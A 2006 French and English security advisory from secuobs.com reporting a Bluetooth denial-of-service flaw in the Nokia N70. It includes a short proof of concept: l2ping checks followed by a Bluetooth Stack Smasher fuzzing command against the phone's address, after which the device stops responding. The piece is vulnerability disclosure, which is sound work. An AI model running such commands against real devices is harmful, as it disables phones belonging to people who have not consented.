|
[Infratech - vulnérabilité] Déni de Service sur NOKIA N70
Par Pierre Betouin,
secuobs.com
Le 10/02/2006
Résumé : Les téléphones portables de la marque scandinave Nokia, modèle N70 sont eux aussi faillibles au Déni de Service provoqué sur la pile Bluetooth via l'utilitaire BSS (cf. bulletin de sécurité pour les téléphones de la marque Sony/Ericsson), Proof of Concept inclu permettant de démontrer la faisabilité du DoS. - Lire l'article
[Version francaise] - [English version]
La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.
Plus d'informations sur les téléphones de cette marque sur lien
En fonction de la version du "Firmware" (logiciel embarqué) et du modèle, l'appareil peut être stoppé (DoS) ou afficher un message "System Error" ( lien )
D'autres modèles de la marque peuvent également être faillibles à ce DoS et doivent être testés avec l'utilitaire de fuzzing Bluetooth Stack Smasher (cf. BSS lien ).
Aucune mise à jour de ce "Firmware" n'est disponible pour l'instant, la seule solution possible est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.
Un nouveau "Firmware" sera peut être disponible auprès du vendeur sous peu.
Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss
Autres ressources sur la sécurité Bluetooth :
[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien
[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth lien
[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien
[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien
[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien
[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson lien
[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien
[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien
[Infratech - vulnérabilité] Déni de Service sur hcidump lien
[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien
[English Version] - [Version francaise]
Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).
More information about these devices on lien
This flaw was found using the BSS tool ( Bluetooth Stack Smasher : lien ).
According to the firmware version and to the model, the device can be halted or can display a "System error" message ( lien )
Other Nokia devices may be affected and should be tested with bss fuzzer. Solution is to switch off bluetooth on the phone.
A firmware upgrade may be distributed later by vendor.
Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss
- Article suivant : [Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70
- Article précédent : Risque de Déni de Service via les réseaux VoIP privés
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70
- Article précédent dans la catégorie Failles : Compromission de Windows XP via les logiciels AOL, ADOBE, MACROMEDIA & MICROSOFT
Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|